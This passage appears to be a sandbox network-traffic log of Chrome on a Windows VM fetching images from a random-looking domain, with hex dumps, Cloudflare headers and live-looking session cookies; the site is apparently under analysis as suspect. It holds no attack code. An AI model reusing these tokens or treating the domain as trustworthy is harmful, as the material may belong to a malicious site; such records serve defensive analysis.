                                                              Referer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:07 UTC677INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:07 GMT
                                                              Content-Type: image/svg+xml
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Disposition: inline; filename="mnV1lfGeFEBrSZF3tuYYejMClYOTm2XI5H6CdAfkleMiUWyqFdfMgv4x5mkyLwx220"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k6R%2FKgGPllRNAtMMgoN%2FYMroho2vWxD6gN2P09lMvHZCpd%2FtQQuV1RSHl%2FgUdNteJANtMtXb31%2FLgn6sGTidMX670utL74WDeshU%2FB%2B6plOdjg1uk1afHxQ8Yxub0g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b381d60431c-EWR
                                                              2024-07-03 07:41:07 UTC692INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                                              Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
                                                              2024-07-03 07:41:07 UTC1179INData Raw: 31 39 38 2d 34 32 34 2e 34 34 35 20 31 32 31 35 2e 36 20 32 36 35 2e 38 20 31 32 31 35 2e 36 7a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 44 29 22 2f 3e 3c 2f 67 3e 3c 64 65 66 73 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 41 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 39 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 31 30 37 63 31 30 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20
                                                              Data Ascii: 198-424.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1"
                                                              2024-07-03 07:41:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              57192.168.2.662937188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:07 UTC1469OUTGET /ijGLf8KcAmo8F8uFMIwMKt5jWtydfJOdOqrh5153ZvUBo56RjXXwgHIOxu3KbwiSDyz230 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: image
                                                              Referer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:07 UTC669INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:07 GMT
                                                              Content-Type: image/png
                                                              Content-Length: 1400
                                                              Connection: close
                                                              Content-Disposition: inline; filename="ijGLf8KcAmo8F8uFMIwMKt5jWtydfJOdOqrh5153ZvUBo56RjXXwgHIOxu3KbwiSDyz230"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2GJiVzWdN4Qt3iMeghL1DOtXqVo%2F1RKOSFhMcoevS6rHQ2dD6%2BPufRQcVLJohM93ii6xhqdK6hxp00X%2BzIKXEg%2B9ftYN1%2BEXucObExKg5DuvmGfAy%2FPUREKspy1IVw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b381d00c427-EWR
                                                              2024-07-03 07:41:07 UTC700INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 6c 00 00 00 18 08 06 00 00 00 1f d5 18 1a 00 00 05 3f 49 44 41 54 68 43 ed 58 bd 6e 13 41 10 be 4b d2 d0 20 87 b4 48 38 bc 00 c9 13 10 37 50 c6 ee 91 70 9e 00 e7 af 26 ae f3 83 f3 04 18 89 3e 97 92 34 98 27 c0 79 81 60 24 5a c0 d0 d0 24 31 df b7 9a 39 8d 97 3b bc 91 0c 77 91 7c d2 c9 f6 7a 76 76 76 be f9 8f 7f d6 1f 8e a2 b0 e7 db dd e4 62 e9 e5 59 f4 15 e4 f7 42 b6 b4 9f 44 71 08 dd 8c 26 5c 03 f1 0c b0 70 65 95 81 72 06 58 19 50 b8 81 0c 33 c0 6e a0 ac 7f 4d da 6a b5 aa f3 f3 f3 2b a3 d1 a8 72 7d 7d 9d 74 3a 9d a1 7f 66 61 80 6d 6d 6d 35 55 18 08 d9 df df df ef e7 29 64 77 77 77 e5 ea ea 6a 85 ff c7 71 3c 3c 3c 3c 4c f8 7d 67 67 67 0d 1f eb 97 97 97 ed ac cb fd 6b 05 4f 93 3f f4 d1 c2 dd 5e 82 67
                                                              Data Ascii: PNGIHDRl?IDAThCXnAK H87Pp&>4'y`$Z$19;w|zvvvbYBDq&\perXP3nMj+r}}t:fammm5U)dwwwjq<<<<L}gggkO?^g
                                                              2024-07-03 07:41:07 UTC700INData Raw: e6 07 18 cc 0f 49 f4 b4 74 ca e1 ef 65 7e 71 8a 26 e8 36 af 32 42 e0 7d c3 2a 56 ce 70 f2 9b 42 c9 f2 22 0d ef ca 27 c1 9e 4d 18 01 73 f0 73 91 99 b2 fa 1e 56 25 2d d6 3f 38 79 43 14 3f 6d 1a 1f b0 85 85 05 7a 09 15 9d 26 5d 5c 98 56 4e eb 73 1e 85 d0 f2 6a 12 60 c6 ea 19 02 6b 59 ad 82 05 0c fc 36 34 d4 59 10 ec ba 28 5f 65 61 5b e1 72 8c c8 1b 31 42 f8 e7 18 d9 1d bd 17 35 18 02 e9 c5 69 a1 75 a3 1c 16 bd fd 1e e6 61 51 f4 2b 7a b6 78 7f f4 2e fa 82 b3 82 3c 2c 7e 1a e6 61 cc 1d 10 7a 2c bc 49 85 54 87 62 da 50 ea 5e 08 60 ba 07 f2 8d 79 aa 35 38 0b 18 2c 7c 51 fb b7 bc 75 dd ab 2d 84 86 5f 95 97 ff fb 6d 85 31 1c e7 91 f6 7c 6b ac 6a 18 37 05 2c 78 f8 0b c0 96 00 58 f0 f0 17 80 65 7a b0 ef 61 04 8c 8d b4 58 de 00 8a 5c 45 98 24 80 15 2d f7 03 01 73 a0
                                                              Data Ascii: Ite~q&62B}*VpB"'MssV%-?8yC?mz&]\VNsj`kY64Y(_ea[r1B5iuaQ+zx.<,~az,ITbP^`y58,|Qu-_m1|kj7,xXezaX\E$-s


                                                              Session IDSource IPSource PortDestination IPDestination Port
                                                              58192.168.2.66293840.113.103.199443
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:07 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 35 58 37 72 31 45 32 37 73 30 69 75 61 57 36 4f 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 62 31 64 35 34 64 39 65 62 33 31 64 36 30 31 0d 0a 0d 0a
                                                              Data Ascii: CNT 1 CON 305MS-CV: 5X7r1E27s0iuaW6O.1Context: 8b1d54d9eb31d601
                                                              2024-07-03 07:41:07 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                              Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                              2024-07-03 07:41:07 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 35 58 37 72 31 45 32 37 73 30 69 75 61 57 36 4f 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 62 31 64 35 34 64 39 65 62 33 31 64 36 30 31 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 62 4a 4d 76 4b 6e 47 2b 5a 70 34 4c 4a 68 46 44 56 76 62 51 4f 48 4f 69 49 4a 65 2b 75 54 4e 65 73 61 45 57 63 67 75 44 5a 51 4c 59 45 6e 41 32 46 79 38 66 77 45 46 76 62 2f 4d 51 31 71 63 6a 6a 64 57 6f 67 34 2b 73 30 63 35 69 2b 6c 49 6d 72 37 6e 46 30 48 33 58 63 62 44 4b 52 74 7a 6b 67 50 46 64 63 67 57 55 54 4a 36 57 33
                                                              Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: 5X7r1E27s0iuaW6O.2Context: 8b1d54d9eb31d601<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAbJMvKnG+Zp4LJhFDVvbQOHOiIJe+uTNesaEWcguDZQLYEnA2Fy8fwEFvb/MQ1qcjjdWog4+s0c5i+lImr7nF0H3XcbDKRtzkgPFdcgWUTJ6W3
                                                              2024-07-03 07:41:07 UTC74OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 51 4f 53 20 35 36 0d 0a 4d 53 2d 43 56 3a 20 35 58 37 72 31 45 32 37 73 30 69 75 61 57 36 4f 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 38 62 31 64 35 34 64 39 65 62 33 31 64 36 30 31 0d 0a 0d 0a
                                                              Data Ascii: BND 3 CON\QOS 56MS-CV: 5X7r1E27s0iuaW6O.3Context: 8b1d54d9eb31d601
                                                              2024-07-03 07:41:07 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                              Data Ascii: 202 1 CON 58
                                                              2024-07-03 07:41:07 UTC58INData Raw: 4d 53 2d 43 56 3a 20 44 32 7a 67 4f 54 58 5a 5a 6b 57 2f 38 78 76 78 48 46 6e 56 41 77 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                              Data Ascii: MS-CV: D2zgOTXZZkW/8xvxHFnVAw.0Payload parsing failed.


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              59192.168.2.662940188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:08 UTC1443OUTGET /uvhQlfoMbJ4XJRFtu2qrnZlpt9TrWXuaMNtQnfO12130 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                              Sec-Fetch-Site: same-origin
                                                              Sec-Fetch-Mode: no-cors
                                                              Sec-Fetch-Dest: image
                                                              Referer: https://vkwek.ckyucle.com/btxrhxzoevmhjxgkorrNPJYPJDHLMKWIDHWYHTNWXE?disyrywmnujjxhqewiiecx076493453020648cccxedfpwocfzkfrs
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:08 UTC640INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:08 GMT
                                                              Content-Type: image/png
                                                              Content-Length: 231
                                                              Connection: close
                                                              Content-Disposition: inline; filename="uvhQlfoMbJ4XJRFtu2qrnZlpt9TrWXuaMNtQnfO12130"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TJEyPdXROiH0A8ndCu4Vycl%2B7spn%2ByapXNA69JfH8rw%2FlqNXoXCDwi%2BzoNZ%2FKEsWvzsvvKM1sEwiN9feOt0sqUJWpbSciEFj5wU3alPCNN6Qi9e4TK2T5Kr26Ayjcw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b3e5f5f4369-EWR
                                                              2024-07-03 07:41:08 UTC231INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 18 00 00 00 18 08 06 00 00 00 e0 77 3d f8 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 a1 49 44 41 54 48 4b ed 93 b1 0d 02 31 10 04 e7 5a a0 0c aa b8 12 a8 80 9c 2e 20 23 24 23 a5 94 2d e1 cb 20 24 24 33 b2 f4 48 1f 80 cf bc 71 80 78 a7 3e ed 78 c7 b6 d1 79 59 e7 7c 16 40 68 f8 8f 14 b9 fb 05 18 24 9d 42 2f 93 81 2a 45 63 f8 0a d8 4a ba 7d 15 d0 12 9e 0f 52 6c d0 1a 5e 04 8c e1 1b e0 0c dc 23 2d 92 0e af 66 de 36 70 f7 63 4a 69 67 66 b5 80 fd 47 80 3c 9c 21 c0 7a ce e5 3e 61 e1 2b 6a 85 84 80 d6 26 55 80 09 e4 da e5 a3 45 2f a8 b4 5f dd 60 2e 64 01 84 e6 7e 5f d1 03 bf ca 37 19 0c 18 34 60 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                              Data Ascii: PNGIHDRw=sRGBIDATHK1Z. #$#- $$3Hqx>xyY|@h$B/*EcJ}Rl^#-f6pcJigfG<!z>a+j&UE/_`.d~_74`IENDB`


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              60192.168.2.662942188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:08 UTC1130OUTGET /mnV1lfGeFEBrSZF3tuYYejMClYOTm2XI5H6CdAfkleMiUWyqFdfMgv4x5mkyLwx220 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              Accept: */*
                                                              Sec-Fetch-Site: none
                                                              Sec-Fetch-Mode: cors
                                                              Sec-Fetch-Dest: empty
                                                              Accept-Encoding: gzip, deflate, br
                                                              Accept-Language: en-US,en;q=0.9
                                                              Cookie: XSRF-TOKEN=eyJpdiI6IjREdHdIdGd2VjJhU0VRemd6ejZkQ1E9PSIsInZhbHVlIjoiYUZ1VUdwVTErTlEyRmlqM0JZNmZ0RFlNSjJhcWpDaVJ0bGNyWEYxZWlWTmJrTnRDUEJhajUzNWViSmw4WWtxYWhyajU2dnhTd1oyU0wwWDBERWN6Q0hjSXBiSDc3dWZRcnFoSm5GM0RCczNRZkNDRE1ZaFA2QnB5aytnbURacUMiLCJtYWMiOiJjNjdmZTFmZTdlNjRhOTgxYzY5YzBjMTBlMzVhMWEzOGVhYzQ0Y2M5NWI0YzY5ZGVjYzlhNzBjMTAwYjc2MThhIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InZCQjZkcVgzekN0b3E2c3BtL3FaQ2c9PSIsInZhbHVlIjoiYUtaUFRybXJtL3R0Ums5a1V1Y3pqZkdweUxaYk4yYjFKV0lsMmcrU2ZmVGRMblk3TXJqMmZBeHpOTXhBektiSnY5bGd5MFBab0djZGw0d1Q1a1NyZXAySkQ2MXRiS0FORHhPVlVaQS9VRjVkR2xsaS9mTUtmbmg4U3VrNjVJa08iLCJtYWMiOiIwZWFjMjE3ODQ5MTNhOWIwZjdlMGQyNjdmOTg5ZGQ5MGNhMWMwNGNkMTkyYjliZWEwYjJlN2RjMzhmOGQ4ZTE4IiwidGFnIjoiIn0%3D
                                                              2024-07-03 07:41:08 UTC671INHTTP/1.1 200 OK
                                                              Date: Wed, 03 Jul 2024 07:41:08 GMT
                                                              Content-Type: image/svg+xml
                                                              Transfer-Encoding: chunked
                                                              Connection: close
                                                              Content-Disposition: inline; filename="mnV1lfGeFEBrSZF3tuYYejMClYOTm2XI5H6CdAfkleMiUWyqFdfMgv4x5mkyLwx220"
                                                              CF-Cache-Status: DYNAMIC
                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=b2DLRUpWBOGdRE3%2B45cc6LdFvWgnKVI5Cxywvn7I1OgDkWCyn2pz6f4IuaJIznJMA%2FtPxKQyjSd04Zxl%2FmhB%2FosmfZ8SV66HhofolYy2kBWkvz2H1BtL8F2QjG2UvQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                              alt-svc: h3=":443"; ma=86400
                                                              Server: cloudflare
                                                              CF-RAY: 89d53b3e5be37cb2-EWR
                                                              2024-07-03 07:41:08 UTC698INData Raw: 37 34 38 0d 0a 3c 73 76 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 77 69 64 74 68 3d 22 31 39 32 30 22 20 68 65 69 67 68 74 3d 22 31 30 38 30 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 3e 3c 67 20 6f 70 61 63 69 74 79 3d 22 2e 32 22 20 63 6c 69 70 2d 70 61 74 68 3d 22 75 72 6c 28 23 45 29 22 3e 3c 70 61 74 68 20 64 3d 22 4d 31 34 36 36 2e 34 20 31 37 39 35 2e 32 63 39 35 30 2e 33 37 20 30 20 31 37 32 30 2e 38 2d 36 32 37 2e 35 32 20 31 37 32 30 2e 38 2d 31 34 30 31 2e 36 53 32 34 31 36 2e 37 37 2d 31 30 30 38 20 31 34 36 36 2e 34 2d 31 30 30 38 2d 32 35 34 2e 34 2d 33 38 30 2e 34 38 32 2d 32 35 34 2e 34 20 33 39 33 2e 36 73 37 37 30 2e 34 32 38 20 31 34 30 31 2e 36 20 31 37 32 30 2e 38 20 31
                                                              Data Ascii: 748<svg xmlns="http://www.w3.org/2000/svg" width="1920" height="1080" fill="none"><g opacity=".2" clip-path="url(#E)"><path d="M1466.4 1795.2c950.37 0 1720.8-627.52 1720.8-1401.6S2416.77-1008 1466.4-1008-254.4-380.482-254.4 393.6s770.428 1401.6 1720.8 1
                                                              2024-07-03 07:41:08 UTC1173INData Raw: 34 2e 34 34 35 20 31 32 31 35 2e 36 20 32 36 35 2e 38 20 31 32 31 35 2e 36 7a 22 20 66 69 6c 6c 3d 22 75 72 6c 28 23 44 29 22 2f 3e 3c 2f 67 3e 3c 64 65 66 73 3e 3c 72 61 64 69 61 6c 47 72 61 64 69 65 6e 74 20 69 64 3d 22 41 22 20 63 78 3d 22 30 22 20 63 79 3d 22 30 22 20 72 3d 22 31 22 20 67 72 61 64 69 65 6e 74 55 6e 69 74 73 3d 22 75 73 65 72 53 70 61 63 65 4f 6e 55 73 65 22 20 67 72 61 64 69 65 6e 74 54 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 31 34 36 36 2e 34 20 33 39 33 2e 36 29 20 72 6f 74 61 74 65 28 39 30 29 20 73 63 61 6c 65 28 31 34 30 31 2e 36 20 31 37 32 30 2e 38 29 22 3e 3c 73 74 6f 70 20 73 74 6f 70 2d 63 6f 6c 6f 72 3d 22 23 31 30 37 63 31 30 22 2f 3e 3c 73 74 6f 70 20 6f 66 66 73 65 74 3d 22 31 22 20 73 74 6f 70 2d 63
                                                              Data Ascii: 4.445 1215.6 265.8 1215.6z" fill="url(#D)"/></g><defs><radialGradient id="A" cx="0" cy="0" r="1" gradientUnits="userSpaceOnUse" gradientTransform="translate(1466.4 393.6) rotate(90) scale(1401.6 1720.8)"><stop stop-color="#107c10"/><stop offset="1" stop-c
                                                              2024-07-03 07:41:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                              Data Ascii: 0


                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              61192.168.2.662946188.114.96.34434156C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              TimestampBytes transferredDirectionData
                                                              2024-07-03 07:41:08 UTC1448OUTGET /qr6FfLhLZ5QwaGe5HJsDHUaandv4RUef6Ia8VBkiV1U467140 HTTP/1.1
                                                              Host: vkwek.ckyucle.com
                                                              Connection: keep-alive
                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                              sec-ch-ua-mobile: ?0
                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                              sec-ch-ua-platform: "Windows"
                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                              Sec-Fetch-Site: same-origin
